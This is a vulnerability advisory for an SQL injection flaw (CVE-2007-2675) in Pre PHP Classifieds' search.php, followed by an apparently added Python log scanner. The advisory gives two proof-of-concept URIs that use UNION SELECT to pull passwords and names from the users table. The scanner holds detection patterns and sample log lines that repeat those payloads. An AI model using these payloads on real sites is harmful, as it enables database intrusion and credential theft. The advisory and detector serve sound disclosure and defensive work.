Pre PHP Classifieds Listings SQL Injection Vulnerability
BID:23795
Info
| Bugtraq ID: | 23795 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-2675 |
| Remote: | Yes |
| Local: | No |
| Published: | May 03 2007 12:00AM |
| Updated: | May 07 2015 05:39PM |
| Credit: | Cyber-Security.org is credited with the discovery of this vulnerability. |
| Vulnerable: | Pre Projects PHP Classifieds 0 |
| Not Vulnerable: | |
Discussion
Pre Classifieds Listings is prone to an SQL injection vulnerability because it fails to properly sanitize user-supplied input.
A successful exploit could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/search.php?category=-1/**/union/**/select/**/pass/**/from/**/users/*
http://www.example.com/search.php?category=-1/**/union/**/select/**/name/**/from/**/users/*
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
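With no vendor patch listed, one interim check is to flag requests to search.php whose category parameter is not a plain integer. The following is an added example, not code from this advisory or from the vendor; the numeric-ID assumption for category, the Common Log Format input, the function names and the sample log lines are all assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate category values are short non-negative integer IDs.
VALID_CATEGORY = re.compile(r"[0-9]{1,10}")
# C-style SQL comments, including an unterminated one at the end of the value.
SQL_COMMENT = re.compile(r"/\*.*?(?:\*/|$)", re.S)
UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
# Request line of a Common Log Format entry (assumed log format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify_category(value):
    """Return 'ok', 'sqli' or 'invalid' for one decoded category value."""
    if VALID_CATEGORY.fullmatch(value):
        return "ok"
    # Turn /**/ separators into spaces so keyword boundaries become visible.
    normalized = SQL_COMMENT.sub(" ", value)
    if UNION_SELECT.search(normalized):
        return "sqli"
    return "invalid"

def scan_access_log(lines):
    """Return (client, verdict, value) for each suspicious search.php request."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/search.php"):
            continue
        # parse_qs percent-decodes values, so encoded variants are normalized too.
        for value in parse_qs(url.query, keep_blank_values=True).get("category", []):
            verdict = classify_category(value)
            if verdict != "ok":
                findings.append((client, verdict, value))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/May/2007:10:00:00 +0000] "GET /search.php?category=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/May/2007:10:01:00 +0000] "GET /search.php?category=-1/**/union/**/select/**/pass/**/from/**/users/* HTTP/1.1" 200 734',
    '198.51.100.7 - - [03/May/2007:10:01:05 +0000] "GET /search.php?category=-1%2F**%2Funion%2F**%2Fselect%2F**%2Fname%2F**%2Ffrom%2F**%2Fusers%2F* HTTP/1.1" 200 741',
    '203.0.113.4 - - [03/May/2007:10:02:00 +0000] "GET /search.php?category=cars HTTP/1.1" 200 312',
    '203.0.113.4 - - [03/May/2007:10:02:30 +0000] "GET /index.php?category=x HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The same integer-only test can be enforced in front of the application as a request filter; it does not replace fixing the query inside search.php.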
References
References:
- Pre Classifieds Listings Web Site (Preprojects)